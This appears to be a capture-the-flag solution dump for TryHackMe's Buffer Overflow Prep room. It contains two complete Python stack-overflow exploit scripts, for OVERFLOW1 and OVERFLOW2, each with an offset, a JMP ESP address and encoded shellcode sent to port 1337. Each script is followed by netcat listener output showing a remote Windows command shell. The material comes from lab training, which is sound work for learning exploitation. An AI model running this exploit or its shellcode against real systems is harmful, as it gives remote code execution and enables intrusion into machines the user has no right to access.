Buffer Overflow preparation room (by Tib3rius) of TryHackMe platform.
#!/usr/bin/python
import socket
ip = "<ip>"
port = 1337
prefix = "OVERFLOW1 "
offset = 1978
overflow = "A"*offset
jmp = "\xAF\x11\x50\x62"
shellcode = ("\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xac\xe5\xca\x95\x83\xee\xfc\xe2\xf4\x50\x0d\x48\x95\xac\xe5"
"\xaa\x1c\x49\xd4\x0a\xf1\x27\xb5\xfa\x1e\xfe\xe9\x41\xc7\xb8"
"\x6e\xb8\xbd\xa3\x52\x80\xb3\x9d\x1a\x66\xa9\xcd\x99\xc8\xb9"
"\x8c\x24\x05\x98\xad\x22\x28\x67\xfe\xb2\x41\xc7\xbc\x6e\x80"
"\xa9\x27\xa9\xdb\xed\x4f\xad\xcb\x44\xfd\x6e\x93\xb5\xad\x36"
"\x41\xdc\xb4\x06\xf0\xdc\x27\xd1\x41\x94\x7a\xd4\x35\x39\x6d"
"\x2a\xc7\x94\x6b\xdd\x2a\xe0\x5a\xe6\xb7\x6d\x97\x98\xee\xe0"
"\x48\xbd\x41\xcd\x88\xe4\x19\xf3\x27\xe9\x81\x1e\xf4\xf9\xcb"
"\x46\x27\xe1\x41\x94\x7c\x6c\x8e\xb1\x88\xbe\x91\xf4\xf5\xbf"
"\x9b\x6a\x4c\xba\x95\xcf\x27\xf7\x21\x18\xf1\x8d\xf9\xa7\xac"
"\xe5\xa2\xe2\xdf\xd7\x95\xc1\xc4\xa9\xbd\xb3\xab\x1a\x1f\x2d"
"\x3c\xe4\xca\x95\x85\x21\x9e\xc5\xc4\xcc\x4a\xfe\xac\x1a\x1f"
"\xc5\xfc\xb5\x9a\xd5\xfc\xa5\x9a\xfd\x46\xea\x15\x75\x53\x30"
"\x5d\xff\xa9\x8d\xc0\x9d\xcd\x27\xa2\x97\xac\xe5\xff\x1c\x4a"
"\x8f\xda\xc3\xfb\x8d\x53\x30\xd8\x84\x35\x40\x29\x25\xbe\x99"
"\x53\xab\xc2\xe0\x40\x8d\x3a\x20\x0e\xb3\x35\x40\xc4\x86\xa7"
"\xf1\xac\x6c\x29\xc2\xfb\xb2\xfb\x63\xc6\xf7\x93\xc3\x4e\x18"
"\xac\x52\xe8\xc1\xf6\x94\xad\x68\x8e\xb1\xbc\x23\xca\xd1\xf8"
"\xb5\x9c\xc3\xfa\xa3\x9c\xdb\xfa\xb3\x99\xc3\xc4\x9c\x06\xaa"
"\x2a\x1a\x1f\x1c\x4c\xab\x9c\xd3\x53\xd5\xa2\x9d\x2b\xf8\xaa"
"\x6a\x79\x5e\x3a\x20\x0e\xb3\xa2\x33\x39\x58\x57\x6a\x79\xd9"
"\xcc\xe9\xa6\x65\x31\x75\xd9\xe0\x71\xd2\xbf\x97\xa5\xff\xac"
"\xb6\x35\x40")
# Badchars of mona: "\x00\x01\x02\x03\x04\x07\x08\x2e\x2f\xa0\xa1"
# Manual guessing Badchars: "\x00\x07\x2e\xa0"
try:
print "\nSending evil buffer..."
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(prefix + overflow + jmp + shellcode)
s.close()
print "\nDone!"
except:
print "\nCould not connect!"┌──(kali㉿kali)-[~]
└─$ sudo rlwrap nc -lnvp 53
[sudo] password for kali:
listening on [any] 53 ...
connect to [<ip>] from (UNKNOWN) [10.10.25.204] 49250
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\admin\Desktop\vulnerable-apps\oscp>#!/usr/bin/python
import socket
ip = "<ip>"
port = 1337
prefix = "OVERFLOW2 "
offset = 634
overflow = "A"*offset
jmp = "\xAF\x11\x50\x62"
nops = "\x90"*16
# Badchars of mona 00 23 24 3c 3d 83 84 ba bb
shellcode = ("\x89\xe6\xda\xc0\xd9\x76\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x4b\x58\x6b\x32\x65\x50\x45\x50\x63\x30\x35\x30\x4c"
"\x49\x78\x65\x76\x51\x6f\x30\x75\x34\x6c\x4b\x42\x70\x70\x30"
"\x4c\x4b\x30\x52\x54\x4c\x6e\x6b\x73\x62\x74\x54\x4c\x4b\x63"
"\x42\x77\x58\x34\x4f\x6f\x47\x62\x6a\x64\x66\x55\x61\x6b\x4f"
"\x4c\x6c\x47\x4c\x75\x31\x31\x6c\x76\x62\x76\x4c\x35\x70\x79"
"\x51\x68\x4f\x36\x6d\x33\x31\x38\x47\x79\x72\x69\x62\x53\x62"
"\x62\x77\x6e\x6b\x53\x62\x64\x50\x4c\x4b\x61\x5a\x67\x4c\x6c"
"\x4b\x50\x4c\x72\x31\x42\x58\x48\x63\x43\x78\x66\x61\x78\x51"
"\x70\x51\x6e\x6b\x62\x79\x65\x70\x33\x31\x48\x53\x6c\x4b\x63"
"\x79\x66\x78\x48\x63\x34\x7a\x47\x39\x6c\x4b\x77\x44\x6e\x6b"
"\x43\x31\x58\x56\x34\x71\x4b\x4f\x4e\x4c\x6a\x61\x58\x4f\x44"
"\x4d\x35\x51\x6b\x77\x44\x78\x59\x70\x32\x55\x4c\x36\x66\x63"
"\x61\x6d\x58\x78\x75\x6b\x73\x4d\x67\x54\x31\x65\x58\x64\x70"
"\x58\x6c\x4b\x70\x58\x54\x64\x63\x31\x38\x53\x52\x46\x6e\x6b"
"\x46\x6c\x52\x6b\x6e\x6b\x62\x78\x47\x6c\x67\x71\x6a\x73\x4c"
"\x4b\x73\x34\x6e\x6b\x75\x51\x6a\x70\x4b\x39\x43\x74\x77\x54"
"\x44\x64\x73\x6b\x71\x4b\x75\x31\x31\x49\x33\x6a\x66\x31\x79"
"\x6f\x69\x70\x53\x6f\x63\x6f\x51\x4a\x6c\x4b\x52\x32\x48\x6b"
"\x4e\x6d\x53\x6d\x43\x58\x75\x63\x30\x32\x77\x70\x67\x70\x45"
"\x38\x71\x67\x32\x53\x77\x42\x51\x4f\x66\x34\x73\x58\x42\x6c"
"\x33\x47\x61\x36\x55\x57\x69\x6f\x49\x45\x4c\x78\x6e\x70\x43"
"\x31\x57\x70\x63\x30\x51\x39\x5a\x64\x31\x44\x62\x70\x61\x78"
"\x44\x69\x4d\x50\x62\x4b\x33\x30\x79\x6f\x39\x45\x76\x30\x66"
"\x30\x72\x70\x52\x70\x63\x70\x30\x50\x67\x30\x66\x30\x35\x38"
"\x6a\x4a\x64\x4f\x39\x4f\x6b\x50\x4b\x4f\x59\x45\x6f\x67\x51"
"\x7a\x43\x35\x72\x48\x64\x4a\x37\x78\x75\x31\x6f\x32\x51\x78"
"\x35\x52\x45\x50\x45\x50\x50\x35\x6e\x69\x69\x76\x73\x5a\x62"
"\x30\x72\x76\x52\x77\x71\x78\x6c\x59\x6c\x65\x71\x64\x45\x31"
"\x59\x6f\x7a\x75\x6b\x35\x49\x50\x54\x34\x46\x6c\x6b\x4f\x32"
"\x6e\x35\x58\x32\x55\x38\x6c\x61\x78\x7a\x50\x38\x35\x4d\x72"
"\x63\x66\x39\x6f\x6a\x75\x42\x48\x45\x33\x30\x6d\x53\x54\x35"
"\x50\x4b\x39\x4d\x33\x61\x47\x53\x67\x63\x67\x44\x71\x4c\x36"
"\x32\x4a\x76\x72\x52\x79\x70\x56\x4a\x42\x69\x6d\x45\x36\x6f"
"\x37\x61\x54\x64\x64\x47\x4c\x45\x51\x56\x61\x4c\x4d\x37\x34"
"\x57\x54\x46\x70\x79\x56\x65\x50\x50\x44\x51\x44\x72\x70\x71"
"\x46\x76\x36\x53\x66\x73\x76\x76\x36\x42\x6e\x51\x46\x51\x46"
"\x43\x63\x70\x56\x35\x38\x74\x39\x7a\x6c\x37\x4f\x6e\x66\x6b"
"\x4f\x59\x45\x4d\x59\x49\x70\x72\x6e\x76\x36\x42\x66\x49\x6f"
"\x44\x70\x62\x48\x43\x38\x6e\x67\x65\x4d\x53\x50\x69\x6f\x79"
"\x45\x6d\x6b\x58\x70\x68\x35\x4f\x52\x36\x36\x35\x38\x69\x36"
"\x4a\x35\x4f\x4d\x6f\x6d\x79\x6f\x4e\x35\x75\x6c\x36\x66\x71"
"\x6c\x45\x5a\x4f\x70\x79\x6b\x59\x70\x64\x35\x75\x55\x6d\x6b"
"\x72\x67\x54\x53\x72\x52\x52\x4f\x72\x4a\x73\x30\x72\x73\x79"
"\x6f\x38\x55\x41\x41")
try:
print "\nSending evil buffer..."
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<ip>", port))
s.send(prefix + overflow + jmp + nops + shellcode)
s.close()
print "\nDone!"
except:
print "\nCould not connect!"┌──(kali㉿kali)-[~]
└─$ sudo rlwrap nc -lnvp 53
[sudo] password for kali:
listening on [any] 53 ...
connect to [<ip>] from (UNKNOWN) [10.10.25.204] 49250
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\admin\Desktop\vulnerable-apps\oscp>